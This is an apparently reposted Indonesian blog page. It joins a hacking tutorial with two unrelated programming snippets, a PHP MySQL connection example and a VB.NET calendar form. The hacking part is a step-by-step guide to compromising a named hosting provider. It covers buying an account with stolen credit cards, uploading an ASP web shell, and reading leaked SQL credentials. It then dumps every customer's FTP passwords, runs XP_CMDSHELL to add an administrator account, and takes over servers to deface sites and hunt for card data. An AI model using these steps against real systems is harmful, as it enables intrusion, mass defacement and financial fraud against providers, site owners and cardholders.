Trik hacking server hosting

—- saya cuma mempublish ulang artikel dari situs mana q da lupa tapi asikk lhoo…

silahkan dicoba klo berhasil pasti ketagihan….—————-
Edthosting.com adalah salah satu hosting service yang cukup besar di US sono, tapi anehnya banyak sekali celah-celah keamanan yang ada. Salah satu celah keamanan yang cukup besar yaitu di bagian yang sering disebut FSO (File System Object). Untuk mengetahui lebih detail mengenai fso silahkan saja kunjungi situs Microsoft atau lainnya karena gue malas ngejelasin disini.

Untuk lebih jelas sekarang kita langsung saja praktek.
Bahan yang diperlukan:
1. Sedikit pengetahuan tentang Asp/Asp.Net
2. Sedikit pengetahuan tentang SQL Server
3. Sedikit pengetahuan tentang DOS Command
4. Script ASPY.ASP buatan Vela iNC , download di http://www.Planet-Source-Code.com
5. Hosting Account di edthosting.com yang dapat dibeli dengan kartu kredit curian, dengan menggunakan proxy US. Dibawah akan dilampirkan beberapa hosting account dengan passwordnya.

Sekarang kita mulai:
1. Apabila anda sudah mempunyai hosting account maka upload file aspy.asp ke directory utama anda dengan gunakan ftp. Kemudian panggil aspy.asp lewat web browser anda (http://situs-anda.com/aspy.asp) dan default passwordnya adalah “password” (tanpa tanda kutip) kemudian tekan enter.

2. Anda akan melihat bahwa directory anda berada di “c:\inetpub\website\situs-anda_com”. Sekarang coba anda ganti menjadi “c:\inetpub\website\” dan binggo anda akan melihat seluruh hosting account yang ada pada server tersebut dan silahkan anda menjelajahi semua directory yang ada didalam server tersebut termasuk ke directory “c:\”.

3. Apabila anda teliti anda akan menemukan file c:\trace.log yang berisi user dan password SQL server. Pilih File tersebut kemudian clik “edit”, Dari file trace.log tersebut didapat hasil yaitu :
a. Nama SQL Server : http://www.empiredatatech.com
b. Username : card471
c. Password : ty38vxqxxx
d. Default database: EDT
Setelah saya teliti ternyata user tersebut mempunyai hak sebagai SA pada SQL server tersebut. Kita jelajahi lebih jauh tentang database EDT pada server tersebut.

4. Jalankan SQL query analyser pada ASPY.ASP (pojok kanan atas), masukkan: “Driver={SQL Server}; Server=www.empiredatatech.com ; Database=EDT; DSN=; UID=card471; PWD=ty38vxq|06;” pada connection string (tanpa tanda kutip). Kemudian klik “table”. Maka akan melihat seluruh table yang ada pada Database tersebut. Table yang cukup penting adalah FTP_User_info. Untuk melihat data yang terdapat pada tabel tersebut masukkan “SELECT * FROM FTP_USER_INFO” dan binggo!! Anda akan melihat seluruh user ftp beserta passwordnya diseluruh server yang ada di hosting service tersebut. Pada langkah ini saja anda sudah bisa mendeface seluruh site yang ada pada database tersebut melalui ftp. Jadi bukan hal susah bagi Edan_Tenanan untuk mendeface kurang lebih 2500 situs dalam satu malam dengan munggunakan FTP Account, tapi ada cara yang lebih cepat dan mudah yang akan dijelaskan dibawah.

5. Dari database EDT didapat berbagai kesimpulan yaitu:
a. Hosting service ini terdiri dari 11 server shared hosting mulai dari yang nama servernya http://www.empiredatatech.com, ww2.empiredatatech.com, sampai ww11.empiredatatech.com dimana semua server memiliki hampir 300 shared hosting dan memiliki SQL server dimana user card471 memiliki hak sebagai sistem administrator (SA).
b. Hosting ini juga memiliki puluhan VPS (virtual private hosting) yang dapat diakses melalui remote desktop. Dan juga memiliki beberapa Dedicated server diantaranya EDTDSA, EDTDSB, EDTDSC dan lain-lain.

6. Apabila kita mau melihat semua database yang ada pada salah satu server kita dapat gunain Http://enterprisemanager.edthosting.com, disini kita juga bisa membuat user yang mempunya hak sebagai sa asalkan kita login sebagai card471 yang mempunyai hak sebagai sa. Bagi yang tertarik dengan kartu kredit silahkan cari sendiri didalam Semua SQL server tersebut satu-persatu. Kebanyakan situs toko yang ada EDTHOSTING menggunakan shoppingcart ASPdotNETstorefront yang mana data kartu kredit beserta CVV-nya telah ter-enkripsi, tapi jangan takut Edan Tenanan bisa menanggulanginya, kalo ada belum tau tanya aja pasti dijawab, tapi kalo udah tau jangan ngoceh hehehehehe

7. Sekarang yang jadi pertanyaan bagaimana edan_tenanan dapat mendeface/mematikan (nggak jelas deface itu bagaimana gue nggak ngerti) seluruh situs hanya dalam waktu satu malam ???????

OK sekarang gue jelasin bagaimana Edan_tenanan dapat menghancurkan seluruh site tersebut .

1. Masuk di http://enterprisemanager.edthosting.com pilih asp enterprisemanager kemudian login server: http://www.empiredatatech.com dengan user: card471 pass: ty38vxq|06 kemudian jalankan Query:
a. XP_CMDSHELL ‘Net user edan tenanan /add’ perintah ini untuk menambahkan user: edan password: tenanan pada komputer server
b. XP_CMDSHELL ‘Net localgroup Administrators edan /add’ perintah ini untuk menjadikan user edan sebagai user dengan hak administrators

2. Jalankan RemoteDesktop (windows XP keatas) kemudian masukkan namaserver (dalam hal ini http://www.empiredatatech.com) kemudian klik connect, tunggu sebentar lalu masukkan user: edan Password:tenanan kemudian pilih OK. Binggo !! Edan Tenanan telah remote ke server dan bisa mematikan atau mendelete semua hosting service yang ada pada IIS servernya termasuk memodifikasi DNS nya, Menjalankan proxy server, menjalankan trojan, menjalankan BOT RagnaRok dan lain-lain.

3. Anda bisa melakukan hal tersebut pada 10 server yang lain, selama IP anda tidak diblokir oleh firewall hehehehe.

4. Bagaimana caranya agar password user Administrator? Caranya dengan perintah ‘Net user Administrator passbaru’ .

koneksi database php dengan mysql

Sebuah website interaktifdan dinamis, tentu membutuhkan penyimpanan data yang

fleksibel dan cepat untuk diakse. salah satu database server adalah MySql. database ini

sangat populerdan digunakan di banyak website2 terkenal.MySql bersifat free(alias

gratis),mysql dapat berjalan diplatform Linux,windows dsb. PHP telah mneyediakan

fasilitas untuk koneksi database baik yang bersifat komersil maupun gratis.

Secara umum koneksi database harus melalui tiga tahap, yaitu:

1. Koneksi database.
2. Query kedatabase.
3. Pemutusan koneksi.

fungsi2 PHP untuk koneksi database,yaitu:

1. Mysql_connect();
2. Mysql_pconnect();
3. Mysql_select_db();

untuk dapat mengakses data yang ada didatabase program php, harus dilakukan koneksi lebih dulu.

contoh:

Mysql_connect(Nama host,nama,password);
berikut ini contoh program untuk koneksi database:

<?php
$koneksi=mysql_connect(“localhost”,”Azwar”,”babi”);
if($koneksi){
echo “Koneksi BErhasil”;
}else{
echo”Koneski gagal coba lagi”;
}
?>
untuk koneksi database menggunakan mysql_pconnect() pada dasarnya sama saja yang membedakan adalah jika mengunakan mysql_pconnect() koneksi tidak akan terputus walaupun program telah selesai diekskusi.

demikian mudahnya menggunakan koneksi database menggunakan PHP, pelajarilah maka anda akan semakin jatuh cinta.

membuat kalender menggunakan vb.net

‘ seperti biasa saya tidak bisa berucap banyak anda cukup copy pastekan kode ini dan jangan lupa di compile…..

Public Class Form1
Inherits System.Windows.Forms.Form

#Region ” Windows Form Designer generated code ”
#End Region

Public Class tanggal
Inherits System.Windows.Forms.Label
End Class
Private datatanggal() As tanggal

Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
ReDim datatanggal(36)
Dim i, labelatas, labelkiri, totalbaris, totalkolom
labelatas = 30
labelkiri = 30
totalbaris = 1
totalkolom = 1
For i = 0 To 36
datatanggal(i) = New tanggal
datatanggal(i).BackColor = System.Drawing.Color.Transparent
datatanggal(i).Font = New System.Drawing.Font(“Microsoft Sans Serif”, 9.75!, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, CType(0, Byte))
datatanggal(i).ForeColor = System.Drawing.Color.Lime
datatanggal(i).Text = i + 1
datatanggal(i).Top = labelatas
datatanggal(i).Left = labelkiri
datatanggal(i).Width = 20
Me.Controls.Add(datatanggal(i))
totalbaris = totalbaris + 1
totalkolom = totalkolom + 1
labelkiri = labelkiri + 60
If totalbaris > 7 Then
labelatas = labelatas + 30
totalbaris = 1
End If
If totalkolom > 7 Then
labelkiri = 30
totalkolom = 1
End If
datatanggal(i).Visible = False
Next
cektanggal(TextBox1.Text, TextBox2.Text)
End Sub
Private Function cektanggal(ByVal bulan As Integer, ByVal tahun As Integer)
Dim Totalhari, haripertama, namabulan, mulai
Dim tanggal As Date
Dim i

For i = 0 To 36
datatanggal(i).Visible = False
Next

If bulan = 1 Then
namabulan = “Jan”
ElseIf bulan = 2 Then
namabulan = “Feb”
ElseIf bulan = 3 Then
namabulan = “Mar”
ElseIf bulan = 4 Then
namabulan = “Apr”
ElseIf bulan = 5 Then
namabulan = “May”
ElseIf bulan = 6 Then
namabulan = “Jun”
ElseIf bulan = 7 Then
namabulan = “Jul”
ElseIf bulan = 8 Then
namabulan = “Aug”
ElseIf bulan = 9 Then
namabulan = “Sep”
ElseIf bulan = 10 Then
namabulan = “Oct”
ElseIf bulan = 11 Then
namabulan = “Nov”
ElseIf bulan = 12 Then
namabulan = “Dec”
End If

Totalhari = Now.DaysInMonth(tahun, bulan)
tanggal = “#1/” & namabulan & “/” & tahun & “#”
haripertama = Format(tanggal, “ddd”)

If haripertama = “Sun” Then
mulai = “0”
ElseIf haripertama = “Mon” Then
mulai = “1”
ElseIf haripertama = “Tue” Then
mulai = “2”
ElseIf haripertama = “Wed” Then
mulai = “3”
ElseIf haripertama = “Thu” Then
mulai = “4”
ElseIf haripertama = “Fri” Then
mulai = “5”
ElseIf haripertama = “Sat” Then
mulai = “6”
End If

For i = 0 To Totalhari – 1
datatanggal(mulai).Visible = True
datatanggal(mulai).Text = i + 1
mulai += 1
Next
End Function

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
cektanggal(TextBox1.Text, TextBox2.Text)
If TextBox1.Text = 1 Then
Label10.Text = “JANUARI”
ElseIf TextBox1.Text = 2 Then
Label10.Text = “PEBRUARI”
ElseIf TextBox1.Text = 3 Then
Label10.Text = “MARET”
ElseIf TextBox1.Text = 4 Then
Label10.Text = “APRIL”
ElseIf TextBox1.Text = 5 Then
Label10.Text = “MEI”
ElseIf TextBox1.Text = 6 Then
Label10.Text = “JUNI”
ElseIf TextBox1.Text = 7 Then
Label10.Text = “JULI”
ElseIf TextBox1.Text = 8 Then
Label10.Text = “AGUSTUS”
ElseIf TextBox1.Text = 9 Then
Label10.Text = “SEPTEMBER”
ElseIf TextBox1.Text = 10 Then
Label10.Text = “OKTOBER”
ElseIf TextBox1.Text = 11 Then
Label10.Text = “NOPEMBER”
ElseIf TextBox1.Text = 12 Then
Label10.Text = “DESEMBER”
End If
End Sub

Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
End
End Sub
End Class